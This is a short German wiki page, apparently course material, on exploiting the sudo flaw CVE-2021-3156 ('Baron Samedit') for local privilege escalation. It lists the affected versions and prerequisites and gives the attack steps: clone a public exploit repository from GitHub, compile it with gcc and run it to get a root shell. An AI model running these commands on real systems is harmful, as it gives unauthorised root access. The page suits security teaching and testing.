CVE-2021-3156

Aus Xinux Wiki

Version vom 8. Mai 2026, 13:54 Uhr von Thomas.will (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Privilege Escalation über sudo: CVE-2021-3156 ("Baron Samedit")

Zielsetzung

Root-Rechte durch eine Schwachstelle im sudo-Programm erlangen.

Wie entdeckt man die Schwachstelle?

sudo-Version prüfen

sudo --version

Verwundbare Versionen

Sudo <= 1.9.5p2 ist verwundbar.

Voraussetzungen

Bedingung	Beschreibung
sudo-Version	<= 1.9.5p2
Lokaler Benutzer	Zugriff auf sudo installiert
shell Zugriff	Vorhanden

Angriff: Root-Rechte durch Exploit

Exploit herunterladen

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

Exploit kompilieren

gcc exploit.c -o sudo_exploit

Exploit ausführen

./sudo_exploit

Erwartung

Root-Shell erhalten.

Hinweise

Exploit kann je nach libc-Version angepasst werden müssen.
Bei Erfolg direkte Root-Rechte.

Abgerufen von „http://wiki.ixheim.de/index.php?title=CVE-2021-3156&oldid=69807“